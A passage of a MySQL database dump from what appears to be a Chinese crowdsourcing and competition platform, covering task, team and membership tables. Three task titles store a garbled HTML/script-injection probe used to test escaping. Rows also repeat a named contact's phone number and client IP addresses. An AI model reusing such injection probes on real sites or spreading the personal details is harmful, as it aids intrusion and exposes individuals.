16:36:13',7,49,'创新院人工智能中心','李国宁','15633333333',0,1,0,'122.115.235.150',NULL,NULL,0,2,0,4,1,1,1,2,1,0,'2019-11-13 08:54:09'),(70,'fdsad',441.00,'086582301465',0,0,NULL,NULL,0,1,0,0,0,1,'2019-11-18 11:11:24','2019-11-18 11:11:24',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'106.3.194.253',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(83,'阿双方对对对撒旦法阿双方对对对撒旦法阿双方对对对撒旦法阿双方对对对撒旦法阿双方对对对对撒旦法阿双方对',2.00,'885875195667',0,0,NULL,NULL,0,1,0,0,0,1,'2019-11-20 19:39:33','2019-11-20 19:39:33',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'122.115.235.203',NULL,NULL,15,15,7,15,15,0,0,0,0,0,NULL),(84,'范德萨',3.00,'473735360516',0,0,NULL,NULL,0,1,0,0,0,1,'2019-11-20 19:39:54','2019-11-20 19:39:54',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'122.115.235.203',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(86,'null,NU/script>)、doucment.write(\"abc\")、<b>hello</b>',10.00,'939578038045',0,0,NULL,NULL,1,1,0,0,0,1,'2019-11-21 10:25:50','2019-11-21 10:25:50',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'122.115.235.209',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(87,'null,NU/script>)、doucment.write(\"abc\")、<b>hello</b>',10.00,'102082653460',0,0,NULL,NULL,1,1,0,0,0,1,'2019-11-21 10:26:20','2019-11-21 10:26:20',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'122.115.235.209',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(88,'null,NU/script>)、doucment.write(\"abc\")、<b>hello</b>',10.00,'402175274320',0,0,NULL,NULL,0,1,0,0,0,1,'2019-11-21 10:37:04','2019-11-21 10:37:04',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'122.115.235.209',NULL,NULL,2147483647,15,7,15,15,0,0,0,0,0,NULL),(89,'sd ',1.00,'861912659396',1,18,'2020-03-23 14:52:04','2020-03-23 14:47:04',1,1,0,8,2,2,'2019-11-21 14:51:00','2021-02-23 16:40:06',7,49,'创新院人工智能中心','李国宁','15633333333',0,2,0,'180.77.228.42',NULL,NULL,1,1,1,1,1,1,0,2,0,0,NULL),(90,'FD',22.00,'644271204762',0,0,NULL,NULL,0,1,0,0,0,1,'2019-12-03 15:11:52','2019-12-03 15:11:52',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.227.230',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(91,'MFC音频录制和播放程序,带波形效果展示',500.00,'022503926624',1,8,'2021-02-23 16:40:09','2019-12-30 09:16:22',0,0,0,8,0,1,'2019-12-30 09:16:22','2021-02-23 16:40:09',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.225.191',NULL,NULL,15,15,7,15,15,1,0,2,0,0,NULL),(92,'GPS定位系统(室内外)',1000.00,'496497140837',1,31,'2019-12-30 09:53:04','2019-12-30 09:18:04',0,1,0,8,3,1,'2019-12-30 09:18:04','2021-02-23 16:40:11',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.225.191',NULL,NULL,0,5,0,15,15,1,1,2,2,0,'2019-12-30 15:40:59'),(93,'嵌入式开发实时采集汽车动态图像识别',6000.00,'228099179858',1,34,'2021-02-23 16:40:18','2019-12-30 09:56:54',0,0,0,8,2,1,'2019-12-30 09:56:54','2021-02-23 16:40:18',9,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.225.191',NULL,NULL,0,15,7,15,15,1,0,2,0,0,NULL),(94,'LINUX环境CUDA加速计算开发调优CUFFT',5000.00,'792111151278',1,26,'2019-12-30 11:08:51','2019-12-30 10:01:51',1,1,0,8,1,2,'2019-12-30 10:01:12','2021-02-24 16:35:38',7,49,'创新院人工智能中心','李国宁','15633333333',0,2,0,'180.77.225.191',NULL,NULL,15,15,7,15,15,1,0,2,0,0,NULL),(95,'0318测试系统接口',1.00,'438541585066',1,31,'2020-03-23 09:21:09','2020-03-23 08:56:09',0,1,1,8,5,1,'2020-03-23 08:56:09','2021-02-23 16:40:23',7,49,'创新院人工智能中心','李国宁','15633333333',1,0,0,'180.77.228.42',NULL,'2020-03-26 10:51:01',1,3,5,7,9,1,1,2,0,0,'2020-03-25 16:08:22'),(96,'0323测试之2',2.00,'059882472572',1,26,'2020-03-23 14:34:37','2020-03-23 08:57:37',0,1,1,7,2,2,'2020-03-23 08:57:37','2021-02-23 16:38:35',7,49,'创新院人工智能中心','李国宁','15633333333',1,0,0,'180.77.228.42',NULL,'2020-03-26 10:51:01',1,1,1,1,333,0,1,1,2,0,'2020-03-25 16:16:10'),(97,'暮色里,小镇名叫泥瓶巷的僻静地方,有位孤苦伶仃的清瘦少年,此时他正按照习俗,一手持蜡烛,一手持桃枝',3.00,'399429178928',1,29,'2020-04-10 08:58:30','2020-03-23 08:58:30',0,1,0,3,0,3,'2020-03-23 08:58:30','2020-04-03 13:38:38',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,14,1,1,1,1,0,0,1,0,0,NULL),(98,'===暮色里,小镇名叫泥瓶巷的僻静地方===0323',4.00,'263365924803',1,26,'2020-03-28 09:09:47','2020-03-23 09:09:47',0,0,0,8,3,1,'2020-03-23 09:09:47','2020-03-27 15:30:50',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42','2020-03-27 15:30:50','2020-03-26 10:51:01',1,1,1,1,1,0,1,0,2,1,'2020-03-25 16:21:20'),(99,'创客空间测试0323===05,测试草稿',5.00,'558939044450',1,37,'2020-03-23 09:18:44','2020-03-23 09:13:44',0,1,0,8,3,3,'2020-03-23 09:13:44','2020-08-21 13:53:47',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42','2020-03-27 15:31:03','2020-03-26 10:51:01',1,1,1,1,1,0,1,0,2,1,'2020-03-25 16:42:14'),(100,'手机5g开发',10000.00,'409582935822',1,76,'2020-03-23 10:01:40','2020-03-23 09:31:40',1,0,1,8,3,1,'2020-03-23 09:15:27','2021-01-28 17:56:17',5,49,'创新院人工智能中心','李国宁','15633333333',1,2,0,'180.77.228.42','2020-03-23 10:42:18',NULL,0,0,0,15,15,0,1,0,2,1,'2020-03-23 10:29:51'),(101,'手机5g开发',10000.00,'064151082408',1,13,'2021-02-23 16:40:16','2020-03-23 09:17:45',1,0,0,8,0,1,'2020-03-23 09:15:33','2021-02-23 16:40:16',5,49,'创新院人工智能中心','李国宁','15633333333',0,2,0,'180.77.228.42',NULL,'2020-03-26 10:51:01',30,0,7,15,15,1,0,2,0,0,NULL),(102,'测试把内容保持为草稿及把草稿再次编辑后发布的流程是否正确==01',6.00,'177308881526',0,0,NULL,NULL,1,0,0,0,0,3,'2020-03-23 09:18:03','2020-03-23 09:18:03',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,1,1,1,1,1,0,0,0,0,0,NULL),(103,'测试把内容保持为草稿及把草稿再次编辑后发布的流程是否正确==01 ',6.00,'808358359910',1,54,'2020-03-23 15:06:39','2020-03-23 14:49:39',1,0,1,6,3,3,'2020-03-23 09:25:43','2020-04-10 18:39:09',7,49,'创新院人工智能中心','李国宁','15633333333',1,2,0,'180.77.228.42',NULL,'2020-04-10 18:19:08',1,1,13,1,1,0,1,1,0,0,'2020-04-02 15:36:07'),(104,'测试时间',10000.00,'406217261253',1,72,'2021-02-23 16:40:31','2020-03-23 17:16:10',0,1,0,8,1,1,'2020-03-23 17:16:10','2021-02-23 16:40:31',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,0,1,0,0,1,1,1,2,0,0,'2020-03-24 17:18:43'),(105,'测试创意征集举报',10000.00,'641324995533',1,32,'2021-02-23 16:40:34','2020-03-24 08:22:34',0,1,0,8,2,3,'2020-03-24 08:22:34','2021-02-23 16:40:34',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,'2020-03-26 10:51:01',0,0,7,15,15,1,1,2,0,0,'2020-03-25 09:18:52'),(106,'计件悬赏',10000.00,'290579493741',1,10,'2020-03-24 10:10:44','2020-03-24 08:48:44',1,0,0,4,1,3,'2020-03-24 08:48:37','2020-12-29 11:34:24',7,49,'创新院人工智能中心','李国宁','15633333333',0,2,0,'180.77.228.42',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(107,'计件悬赏',1111.00,'587233372499',1,2,'2020-03-24 10:11:56','2020-03-24 08:49:56',0,0,0,4,1,3,'2020-03-24 08:49:56','2020-04-09 10:17:09',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(108,'创意计件',111.00,'961429766709',1,55,'2020-05-04 08:50:46','2020-03-24 08:50:46',0,1,0,4,2,3,'2020-03-24 08:50:46','2020-04-03 10:42:39',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,0,4,7,15,15,0,1,1,0,0,'2020-03-24 17:11:33'),(109,'阿斯蒂芬',10000.00,'233293078109',1,7,'2020-03-25 17:13:38','2020-03-25 15:51:38',0,0,0,3,0,1,'2020-03-25 15:51:38','2021-03-05 08:51:38',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(110,'11',1111.00,'149649469480',1,23,'2020-03-30 15:52:03','2020-03-25 15:52:03',0,0,0,4,1,1,'2020-03-25 15:52:03','2020-04-03 10:41:34',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.228.42',NULL,NULL,1,1,1,1,1,0,0,0,0,0,NULL),(111,'TEST+TEST+TEST',5000.00,'535313826992',1,15,'2020-03-26 19:51:13','2020-03-26 16:51:13',0,1,0,3,0,2,'2020-03-26 16:51:13','2021-01-28 17:58:04',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'117.136.0.215',NULL,NULL,100,30,30,10,10,0,0,0,0,0,NULL),(112,'QQQ',1000.00,'760749218603',1,4,'2020-03-27 16:54:16','2020-03-27 15:32:16',0,1,0,3,0,1,'2020-03-27 15:32:16','2020-12-24 12:26:16',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.224.204',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(113,'11',11111.00,'068925766721',1,80,'2020-04-02 15:44:27','2020-04-02 15:35:27',0,1,0,4,1,1,'2020-04-02 15:35:27','2021-02-18 10:31:46',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.227.85',NULL,NULL,1,5,1,1,1,0,0,1,0,0,NULL),(114,'延期功能测试01',1.00,'495236401264',1,31,'2020-04-09 09:08:55','2020-04-09 09:03:55',0,1,0,6,2,2,'2020-04-09 09:03:55','2020-09-02 09:17:29',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.224.244',NULL,'2020-04-10 18:19:08',1,1,1,1,1,0,1,0,0,0,'2020-04-10 10:01:15'),(115,'logo创意征集',12.00,'977955112298',1,12,'2020-10-15 10:11:37','2020-10-15 10:05:37',0,1,0,6,2,1,'2020-10-15 10:05:37','2020-10-16 08:27:55',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.231.62',NULL,'2020-10-16 08:24:48',1,1,2,1,1,0,1,0,0,0,'2020-10-16 08:24:25'),(116,'专家在线评审系统',19999.00,'900300739755',1,47,'2020-10-15 12:06:17','2020-10-15 10:16:17',0,0,0,7,3,2,'2020-10-15 10:16:17','2021-03-12 09:52:03',7,49,'创新院人工智能中心','李国宁','15633333333',0,3,0,'180.77.231.62',NULL,'2020-10-15 17:28:10',50,20,10,15,15,0,1,0,2,0,'2020-10-15 17:22:02'),(117,'数据挖掘算法验证',1999.00,'032277407492',1,43,'2020-10-16 08:41:44','2020-10-16 08:02:44',0,1,0,8,2,1,'2020-10-16 08:02:44','2020-12-16 16:19:34',7,49,'创新院人工智能中心','李国宁','15633333333',0,1,0,'180.77.231.62',NULL,'2020-10-16 08:07:48',3,5,7,9,15,0,1,0,1,0,'2020-10-16 08:07:25'),(118,'5G蜂窝移动通信系统',199.00,'905817345120',1,34,'2020-10-16 09:00:57','2020-10-16 08:48:57',0,0,0,8,2,1,'2020-10-16 08:48:57','2020-10-16 10:38:16',5,49,'创新院人工智能中心','李国宁','15633333333',0,1,0,'180.77.231.62',NULL,'2020-10-16 08:56:33',3,2,1,3,3,0,1,0,1,0,'2020-10-16 08:54:43'),(119,'大数据在线采集软件',1999.00,'684112507312',1,19,'2020-10-16 14:42:33','2020-10-16 12:24:33',0,0,0,6,2,3,'2020-10-16 12:24:33','2021-03-12 09:48:28',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'180.77.231.62',NULL,'2020-10-16 15:00:15',130,2,2,2,2,0,1,0,0,0,'2020-10-16 14:59:54'),(120,'5G通信在医疗手术中的应用',111.00,'565926784865',1,11,'2020-12-01 12:34:19','2020-12-01 11:12:19',0,1,1,4,1,1,'2020-12-01 11:12:19','2021-01-28 18:26:12',5,49,'创新院人工智能中心','李国宁','15633333333',1,0,0,'121.101.212.150',NULL,NULL,30,15,7,15,15,0,0,0,0,0,NULL),(121,'开源软件模块开发',10000.00,'658907657480',1,23,'2021-02-23 15:04:31','2021-02-23 14:44:31',0,0,1,6,2,1,'2021-02-23 14:44:31','2021-03-15 11:09:27',7,49,'创新院人工智能中心','李国宁','15633333333',1,0,0,'121.40.124.235',NULL,'2021-02-23 16:34:36',10,10,-20,10,10,0,1,1,0,0,'2021-02-23 16:34:11'),(122,'test11',1000.00,'211029331150',1,15,'2021-02-23 17:12:44','2021-02-23 16:35:44',0,0,0,6,1,1,'2021-02-23 16:35:44','2021-02-24 11:05:08',7,49,'创新院人工智能中心','李国宁','15633333333',0,0,0,'121.40.124.235',NULL,'2021-02-23 16:53:46',10,-10,7,15,15,0,1,1,0,0,'2021-02-23 16:53:15');
|
||
/*!40000 ALTER TABLE `tasks` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `team_members`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `team_members`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `team_members` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`competition_team_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`role` int(11) DEFAULT NULL,
|
||
`competition_id` int(11) DEFAULT NULL,
|
||
`is_teacher` tinyint(1) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=85 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `team_members`
|
||
--
|
||
|
||
LOCK TABLES `team_members` WRITE;
|
||
/*!40000 ALTER TABLE `team_members` DISABLE KEYS */;
|
||
INSERT INTO `team_members` VALUES (1,1,52,1,6,1,'2019-08-09 15:58:29','2019-08-09 15:58:29'),(2,1,23,2,6,0,'2019-08-09 15:58:29','2019-08-09 15:58:29'),(3,1,50,NULL,6,0,'2019-08-09 16:12:23','2019-08-09 16:12:23'),(4,2,49,1,6,1,'2019-08-13 10:05:46','2019-08-13 10:05:46'),(5,2,53,2,6,0,'2019-08-13 10:05:46','2019-08-13 10:05:46'),(6,3,50,1,8,0,'2019-08-15 08:49:15','2019-08-15 08:49:15'),(7,4,20,1,8,0,'2019-10-08 13:51:28','2019-10-08 13:51:28'),(8,5,20,1,7,0,'2019-10-08 13:51:44','2019-10-08 13:51:44'),(9,6,49,1,7,1,'2019-10-08 13:54:59','2019-10-08 13:54:59'),(10,6,37,2,7,0,'2019-10-08 13:54:59','2019-10-08 13:54:59'),(11,6,23,2,7,0,'2019-10-08 13:54:59','2019-10-08 13:54:59'),(12,6,50,NULL,7,0,'2019-10-08 13:57:11','2019-10-08 13:57:11'),(13,7,46,1,8,0,'2019-10-22 16:26:58','2019-10-22 16:26:58'),(14,8,46,1,9,0,'2019-10-30 16:42:07','2019-10-30 16:42:07'),(15,9,49,1,9,0,'2019-11-05 11:03:47','2019-11-05 11:03:47'),(16,10,50,1,12,0,'2019-11-05 17:34:46','2019-11-05 17:34:46'),(17,11,49,1,12,0,'2019-11-05 17:35:12','2019-11-05 17:35:12'),(18,12,46,1,11,0,'2019-11-06 08:46:44','2019-11-06 08:46:44'),(19,12,53,2,11,0,'2019-11-06 08:46:44','2019-11-06 08:46:44'),(20,13,49,1,11,1,'2019-11-06 17:22:49','2019-11-06 17:22:49'),(21,13,56,2,11,0,'2019-11-06 17:22:49','2019-11-06 17:22:49'),(22,14,49,1,13,0,'2019-11-07 09:25:39','2019-11-07 09:25:39'),(23,15,64,1,11,0,'2019-11-07 17:04:33','2019-11-07 17:04:33'),(24,15,19,2,11,0,'2019-11-07 17:04:33','2019-11-07 17:04:33'),(25,16,50,1,15,0,'2019-11-10 13:59:18','2019-11-10 13:59:18'),(26,17,63,1,15,0,'2019-11-10 14:06:46','2019-11-10 14:06:46'),(27,17,19,2,15,0,'2019-11-10 14:06:46','2019-11-10 14:06:46'),(28,17,46,2,15,0,'2019-11-10 14:06:46','2019-11-10 14:06:46'),(29,18,71,1,15,0,'2019-11-10 14:08:31','2019-11-10 14:08:31'),(30,18,55,2,15,0,'2019-11-10 14:08:31','2019-11-10 14:08:31'),(31,18,23,2,15,0,'2019-11-10 14:08:31','2019-11-10 14:08:31'),(32,19,66,1,15,0,'2019-11-10 14:09:13','2019-11-10 14:09:13'),(33,19,38,2,15,0,'2019-11-10 14:09:13','2019-11-10 14:09:13'),(34,20,59,1,15,0,'2019-11-13 08:45:08','2019-11-13 08:45:08'),(35,20,58,2,15,0,'2019-11-13 08:45:08','2019-11-13 08:45:08'),(36,21,46,1,16,0,'2019-11-25 06:15:32','2019-11-25 06:15:32'),(37,22,65,1,16,0,'2019-11-25 08:30:27','2019-11-25 08:30:27'),(38,23,49,1,16,0,'2019-11-25 08:31:29','2019-11-25 08:31:29'),(39,24,49,1,17,1,'2019-11-25 08:43:56','2019-11-25 08:43:56'),(40,24,19,2,17,0,'2019-11-25 08:43:56','2019-11-25 08:43:56'),(41,25,65,1,17,0,'2019-11-25 09:06:20','2019-11-25 09:06:20'),(42,25,9,2,17,0,'2019-11-25 09:06:20','2019-11-25 09:06:20'),(43,26,49,1,18,1,'2019-11-25 09:18:51','2019-11-25 09:18:51'),(44,26,41,2,18,0,'2019-11-25 09:18:51','2019-11-25 09:18:51'),(45,26,46,NULL,18,0,'2019-11-25 09:32:41','2019-11-25 09:32:41'),(46,27,73,1,21,0,'2020-03-18 15:54:48','2020-03-18 15:54:48'),(47,27,3,2,21,0,'2020-03-18 15:54:48','2020-03-18 15:54:48'),(48,28,46,1,20,0,'2020-03-18 15:58:25','2020-03-18 15:58:25'),(49,29,63,1,20,0,'2020-03-18 16:02:18','2020-03-18 16:02:18'),(50,30,1,1,21,1,'2020-03-18 16:22:31','2020-03-18 16:22:31'),(51,30,5,2,21,0,'2020-03-18 16:22:31','2020-03-18 16:22:31'),(52,31,49,1,21,1,'2020-03-18 16:29:36','2020-03-18 16:29:36'),(53,31,6,2,21,0,'2020-03-18 16:29:36','2020-03-18 16:29:36'),(54,32,63,1,22,0,'2020-03-18 16:48:07','2020-03-18 16:48:07'),(55,32,16,2,22,0,'2020-03-18 16:48:07','2020-03-18 16:48:07'),(56,33,46,1,22,0,'2020-03-18 16:50:17','2020-03-18 16:50:17'),(57,33,41,2,22,0,'2020-03-18 16:50:17','2020-03-18 16:50:17'),(58,30,46,NULL,21,0,'2020-03-18 16:51:30','2020-03-18 16:51:30'),(59,27,63,NULL,21,0,'2020-03-18 16:53:04','2020-03-18 16:53:04'),(60,30,66,NULL,21,0,'2020-03-19 09:12:36','2020-03-19 09:12:36'),(61,34,114,1,6,0,'2020-08-17 11:17:26','2020-08-17 11:17:26'),(62,34,4,2,6,0,'2020-08-17 11:17:26','2020-08-17 11:17:26'),(63,35,1,1,24,0,'2020-08-17 15:07:11','2020-08-17 15:07:11'),(64,36,1,1,25,1,'2020-08-17 15:07:54','2020-08-17 15:07:54'),(65,36,46,2,25,0,'2020-08-17 15:07:54','2020-08-17 15:07:54'),(66,37,114,1,25,0,'2020-08-17 17:10:27','2020-08-17 17:10:27'),(67,37,4,2,25,0,'2020-08-17 17:10:27','2020-08-17 17:10:27'),(68,37,19,2,25,0,'2020-08-17 17:10:27','2020-08-17 17:10:27'),(69,38,48,1,24,0,'2020-08-20 11:14:47','2020-08-20 11:14:47'),(70,39,47,1,24,0,'2020-08-20 16:41:18','2020-08-20 16:41:18'),(71,40,49,1,24,0,'2020-08-21 09:07:21','2020-08-21 09:07:21'),(72,41,47,1,25,0,'2020-08-21 10:39:31','2020-08-21 10:39:31'),(73,41,9,2,25,0,'2020-08-21 10:39:31','2020-08-21 10:39:31'),(74,42,111,1,25,0,'2020-08-24 16:29:56','2020-08-24 16:29:56'),(75,42,51,2,25,0,'2020-08-24 16:29:56','2020-08-24 16:29:56'),(76,43,111,1,24,0,'2020-08-24 16:36:26','2020-08-24 16:36:26'),(77,44,1,1,26,1,'2020-09-21 17:25:55','2020-09-21 17:25:55'),(78,44,3,2,26,0,'2020-09-21 17:25:55','2020-09-21 17:25:55'),(79,44,4,2,26,0,'2020-09-21 17:25:55','2020-09-21 17:25:55'),(80,44,5,2,26,0,'2020-09-21 17:25:55','2020-09-21 17:25:55'),(81,45,46,1,27,0,'2020-10-16 15:20:39','2020-10-16 15:20:39'),(82,46,49,1,28,1,'2021-02-24 08:24:42','2021-02-24 08:24:42'),(83,46,6,2,28,0,'2021-02-24 08:24:42','2021-02-24 08:24:42'),(84,46,73,NULL,28,0,'2021-02-24 08:26:22','2021-02-24 08:26:22');
|
||
/*!40000 ALTER TABLE `team_members` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `team_projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `team_projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `team_projects` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`project_id` bigint(20) DEFAULT NULL,
|
||
`team_id` bigint(20) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_team_projects_on_organization_id` (`organization_id`),
|
||
KEY `index_team_projects_on_project_id` (`project_id`),
|
||
KEY `index_team_projects_on_team_id` (`team_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `team_projects`
|
||
--
|
||
|
||
LOCK TABLES `team_projects` WRITE;
|
||
/*!40000 ALTER TABLE `team_projects` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `team_projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `team_units`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `team_units`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `team_units` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`team_id` bigint(20) DEFAULT NULL,
|
||
`unit_type` int(11) DEFAULT NULL COMMENT '访问单元类型',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_team_units_on_organization_id` (`organization_id`),
|
||
KEY `index_team_units_on_team_id` (`team_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `team_units`
|
||
--
|
||
|
||
LOCK TABLES `team_units` WRITE;
|
||
/*!40000 ALTER TABLE `team_units` DISABLE KEYS */;
|
||
INSERT INTO `team_units` VALUES (1,188,1,1,'2021-03-02 03:43:11','2021-03-02 03:43:11'),(2,188,1,2,'2021-03-02 03:43:11','2021-03-02 03:43:11'),(3,188,1,3,'2021-03-02 03:43:11','2021-03-02 03:43:11'),(4,188,1,4,'2021-03-02 03:43:11','2021-03-02 03:43:11');
|
||
/*!40000 ALTER TABLE `team_units` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `team_users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `team_users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `team_users` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`team_id` bigint(20) DEFAULT NULL,
|
||
`user_id` bigint(20) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_team_users_on_organization_id` (`organization_id`),
|
||
KEY `index_team_users_on_team_id` (`team_id`),
|
||
KEY `index_team_users_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `team_users`
|
||
--
|
||
|
||
LOCK TABLES `team_users` WRITE;
|
||
/*!40000 ALTER TABLE `team_users` DISABLE KEYS */;
|
||
INSERT INTO `team_users` VALUES (1,188,1,128,'2021-03-02 03:43:11','2021-03-02 03:43:11');
|
||
/*!40000 ALTER TABLE `team_users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `teams`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `teams`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `teams` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`organization_id` bigint(20) DEFAULT NULL,
|
||
`name` varchar(255) DEFAULT NULL COMMENT '团队名称',
|
||
`description` varchar(255) DEFAULT NULL COMMENT '团队描述',
|
||
`authorize` int(11) DEFAULT '0' COMMENT '团队权限',
|
||
`num_projects` int(11) DEFAULT '0' COMMENT '团队项目数量',
|
||
`num_users` int(11) DEFAULT '0' COMMENT '团队成员数量',
|
||
`includes_all_project` tinyint(1) DEFAULT '0' COMMENT '团队是否拥有所有项目',
|
||
`can_create_org_project` tinyint(1) DEFAULT '0' COMMENT '团队是否能创建项目',
|
||
`gtid` int(11) DEFAULT NULL COMMENT '团队在gitea里的id',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_teams_on_organization_id` (`organization_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `teams`
|
||
--
|
||
|
||
LOCK TABLES `teams` WRITE;
|
||
/*!40000 ALTER TABLE `teams` DISABLE KEYS */;
|
||
INSERT INTO `teams` VALUES (1,188,'Owners','',4,0,1,1,1,1,'2021-03-02 03:43:11','2021-03-02 03:43:11');
|
||
/*!40000 ALTER TABLE `teams` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `tidings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `tidings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `tidings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`trigger_user_id` int(11) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`parent_container_id` int(11) DEFAULT NULL,
|
||
`parent_container_type` varchar(255) DEFAULT NULL,
|
||
`belong_container_id` int(11) DEFAULT NULL,
|
||
`belong_container_type` varchar(255) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`viewed` tinyint(1) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`tiding_type` varchar(255) DEFAULT NULL,
|
||
`extra` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=1995 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `tidings`
|
||
--
|
||
|
||
LOCK TABLES `tidings` WRITE;
|
||
/*!40000 ALTER TABLE `tidings` DISABLE KEYS */;
|
||
